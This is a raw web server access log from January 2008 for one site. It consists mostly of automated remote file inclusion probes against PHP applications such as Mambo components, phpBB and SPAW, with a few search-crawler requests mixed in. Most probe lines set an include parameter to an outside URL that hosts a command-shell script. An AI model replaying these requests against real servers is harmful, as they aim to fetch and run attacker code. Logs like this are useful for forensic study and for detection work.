202.181.206.50 - - [25/Jan/2008:18:17:49 -0800] "GET /logs/access_071222.log//index.php?sub=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.106.251.51 - - [25/Jan/2008:18:18:26 -0800] "GET /logs/admin/functions/inc.steps.init_system.php?MY_CONF[classRoot]=Shellhttp://www.dzieckowice.pl/wordpress-2.1.3/wp-content/plugins/banner/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
24.106.251.51 - - [25/Jan/2008:18:18:26 -0800] "GET /admin/functions/inc.steps.init_system.php?MY_CONF[classRoot]=Shellhttp://www.dzieckowice.pl/wordpress-2.1.3/wp-content/plugins/banner/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:18:19:42 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.venox.xpg.com.br/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.86.86 - - [25/Jan/2008:18:20:29 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://fantastiki.net/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.3.86.86 - - [25/Jan/2008:18:20:29 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://fantastiki.net/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.151.233.24 - - [25/Jan/2008:18:23:21 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.151.233.24 - - [25/Jan/2008:18:23:22 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.151.233.24 - - [25/Jan/2008:18:23:23 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.156 - - [25/Jan/2008:18:26:21 -0800] "GET /minamijewelry/moon.psd HTTP/1.0" 200 108656 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.150.135.1 - - [25/Jan/2008:18:31:13 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
202.150.135.1 - - [25/Jan/2008:18:31:13 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
74.6.27.48 - - [25/Jan/2008:18:31:33 -0800] "GET /megumi/earrings/?D=A HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.163.197.176 - - [25/Jan/2008:18:31:40 -0800] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.249.12.131 - - [25/Jan/2008:18:32:53 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.150.135.1 - - [25/Jan/2008:18:33:14 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.durere.3x.ro/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
209.249.12.131 - - [25/Jan/2008:18:33:43 -0800] "GET /logs/access_071229.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pilcom.net/data/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.156.153 - - [25/Jan/2008:18:33:43 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://geocities.com/lampungstreetart/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.249.12.131 - - [25/Jan/2008:18:33:43 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pilcom.net/data/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.249.12.131 - - [25/Jan/2008:18:33:43 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pilcom.net/data/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.172.129.117 - - [25/Jan/2008:18:34:17 -0800] "GET /logs/index.php?pag=http://www.labcetel.com.br/nn.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.172.129.117 - - [25/Jan/2008:18:34:17 -0800] "GET /index.php?pag=http://www.labcetel.com.br/nn.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.172.129.117 - - [25/Jan/2008:18:34:18 -0800] "GET /logs/index.php?pag=http://www.adaptalentes.com.br/its.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
83.172.129.117 - - [25/Jan/2008:18:34:18 -0800] "GET /index.php?pag=http://www.adaptalentes.com.br/its.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
209.249.12.131 - - [25/Jan/2008:18:34:33 -0800] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://www.pilcom.net/data/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.249.12.131 - - [25/Jan/2008:18:34:33 -0800] "GET //components/minibb/index.php?absolute_path=http://www.pilcom.net/data/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.249.12.131 - - [25/Jan/2008:18:34:33 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://www.pilcom.net/data/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.12 - - [25/Jan/2008:18:34:53 -0800] "GET /index.php?body=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.12 - - [25/Jan/2008:18:34:53 -0800] "GET /index.php?body=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.249.12.131 - - [25/Jan/2008:18:35:10 -0800] "GET //components/minibb/index.php?absolute_path=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:18:36:12 -0800] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://brmania.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.71 - - [25/Jan/2008:18:36:40 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [25/Jan/2008:18:36:41 -0800] "GET /logs/access.log HTTP/1.0" 200 505862 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.249.12.131 - - [25/Jan/2008:18:36:45 -0800] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.249.12.131 - - [25/Jan/2008:18:36:45 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.156.153 - - [25/Jan/2008:18:38:42 -0800] "GET //components/minibb/index.php?absolute_path=http://geocities.com/lampungstreetart/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.56.183 - - [25/Jan/2008:18:38:53 -0800] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.183 - - [25/Jan/2008:18:38:53 -0800] "GET //components/minibb/index.php?absolute_path=????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.183 - - [25/Jan/2008:18:38:54 -0800] "GET /logs//components/minibb/index.php?absolute_path=????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.175.50 - - [25/Jan/2008:18:40:28 -0800] "GET //photoalb/lib/static/header.php?set_menu=http://www.supriatna.name/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
67.15.175.50 - - [25/Jan/2008:18:40:29 -0800] "GET /logs//photoalb/lib/static/header.php?set_menu=http://www.supriatna.name/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
72.55.156.153 - - [25/Jan/2008:18:40:30 -0800] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://geocities.com/lampungstreetart/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.156.153 - - [25/Jan/2008:18:40:31 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://geocities.com/lampungstreetart/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:18:40:38 -0800] "GET /logs/access_071229.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.venox.xpg.com.br/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:18:40:39 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.venox.xpg.com.br/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:18:41:00 -0800] "GET /logs/access.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.venox.xpg.com.br/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.249.12.131 - - [25/Jan/2008:18:41:25 -0800] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://www.delire.ru//modules/4nAlbum/public/in.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.249.12.131 - - [25/Jan/2008:18:41:26 -0800] "GET //components/minibb/index.php?absolute_path=http://www.delire.ru//modules/4nAlbum/public/in.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.249.12.131 - - [25/Jan/2008:18:41:26 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://www.delire.ru//modules/4nAlbum/public/in.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.224.20 - - [25/Jan/2008:18:41:34 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.venox.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [25/Jan/2008:18:41:34 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.venox.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [25/Jan/2008:18:41:35 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.venox.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.199.102.93 - - [25/Jan/2008:18:42:02 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.199.102.93 - - [25/Jan/2008:18:42:02 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.224.20 - - [25/Jan/2008:18:42:33 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://www.venox.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.71 - - [25/Jan/2008:18:43:49 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.141.110 - - [25/Jan/2008:18:44:07 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.48.120 - - [25/Jan/2008:18:44:10 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.48.120 - - [25/Jan/2008:18:44:10 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.151.161 - - [25/Jan/2008:18:46:09 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [25/Jan/2008:18:46:09 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [25/Jan/2008:18:46:10 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.35.191.126 - - [25/Jan/2008:18:46:32 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.126 - - [25/Jan/2008:18:46:33 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
63.147.134.12 - - [25/Jan/2008:18:46:34 -0800] "GET /logs/access_071225.log/index.php?body=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.12 - - [25/Jan/2008:18:46:34 -0800] "GET /logs/access_071225.log/index.php?body=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.12 - - [25/Jan/2008:18:46:34 -0800] "GET /logs/index.php?body=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.12 - - [25/Jan/2008:18:46:34 -0800] "GET /logs/index.php?body=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.141.110 - - [25/Jan/2008:18:47:26 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.200 - - [25/Jan/2008:18:47:53 -0800] "GET /minamijewelry/source_images/updated1/?N=D HTTP/1.0" 200 1427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.141.110 - - [25/Jan/2008:18:49:38 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.249.12.131 - - [25/Jan/2008:18:49:42 -0800] "GET /logs/access_071229.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.249.12.131 - - [25/Jan/2008:18:49:42 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pilcom.net/data/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.183 - - [25/Jan/2008:18:49:46 -0800] "GET /logs/access_071229.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.183 - - [25/Jan/2008:18:49:47 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.183 - - [25/Jan/2008:18:49:47 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.156.153 - - [25/Jan/2008:18:51:01 -0800] "GET /logs/access_071229.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://geocities.com/lampungstreetart/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.156.153 - - [25/Jan/2008:18:51:01 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://geocities.com/lampungstreetart/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.151.161 - - [25/Jan/2008:18:53:38 -0800] "GET /logs/access_071225.log/index.php?pagina1=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [25/Jan/2008:18:53:38 -0800] "GET /index.php?pagina1=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [25/Jan/2008:18:53:39 -0800] "GET /logs/index.php?pagina1=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.48.120 - - [25/Jan/2008:18:53:45 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.176.161.204 - - [25/Jan/2008:18:54:24 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
213.176.161.204 - - [25/Jan/2008:18:54:25 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
213.176.161.204 - - [25/Jan/2008:18:54:27 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.4.20.46 - - [25/Jan/2008:18:55:31 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.21.10 - - [25/Jan/2008:18:55:42 -0800] "GET /logs/access_071225.log/index.php?pag=http://deprive29.fileave.com/cmd4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.21.10 - - [25/Jan/2008:18:55:43 -0800] "GET /index.php?pag=http://deprive29.fileave.com/cmd4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.21.10 - - [25/Jan/2008:18:55:43 -0800] "GET /logs/index.php?pag=http://deprive29.fileave.com/cmd4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.79.190.28 - - [25/Jan/2008:18:55:50 -0800] "GET /logs/index.php?pag=http://www.labcetel.com.br/nn.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
217.79.190.28 - - [25/Jan/2008:18:55:50 -0800] "GET /index.php?pag=http://www.labcetel.com.br/nn.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
217.79.190.28 - - [25/Jan/2008:18:55:50 -0800] "GET /logs/index.php?pag=http://www.adaptalentes.com.br/its.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
217.79.190.28 - - [25/Jan/2008:18:55:50 -0800] "GET /index.php?pag=http://www.adaptalentes.com.br/its.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
203.151.233.24 - - [25/Jan/2008:18:56:01 -0800] "GET /logs/access_071225.log/index.php?pagina1=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.151.233.24 - - [25/Jan/2008:18:56:02 -0800] "GET /index.php?pagina1=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.151.233.24 - - [25/Jan/2008:18:56:07 -0800] "GET /logs/index.php?pagina1=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.118.239 - - [25/Jan/2008:18:57:17 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:18:59:43 -0800] "GET /logs/access_071228.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://brmania.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:18:59:44 -0800] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://brmania.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.141.110 - - [25/Jan/2008:18:59:46 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [25/Jan/2008:18:59:46 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.172.129.117 - - [25/Jan/2008:19:00:57 -0800] "GET /logs/index2.php?pag=http://www.labcetel.com.br/nn.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.172.129.117 - - [25/Jan/2008:19:00:57 -0800] "GET /index2.php?pag=http://www.labcetel.com.br/nn.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.172.129.117 - - [25/Jan/2008:19:00:58 -0800] "GET /index2.php?pag=http://www.adaptalentes.com.br/its.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
83.172.129.117 - - [25/Jan/2008:19:00:58 -0800] "GET /logs/index2.php?pag=http://www.adaptalentes.com.br/its.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
207.58.141.110 - - [25/Jan/2008:19:01:00 -0800] "GET /logs/access.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [25/Jan/2008:19:01:00 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:19:01:32 -0800] "GET /logs/access_071225.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://brmania.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.141.110 - - [25/Jan/2008:19:02:41 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.4.20.46 - - [25/Jan/2008:19:02:45 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:19:03:02 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:19:03:03 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:19:03:03 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/dd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.144.55.219 - - [25/Jan/2008:19:03:03 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
72.30.216.103 - - [25/Jan/2008:19:03:48 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
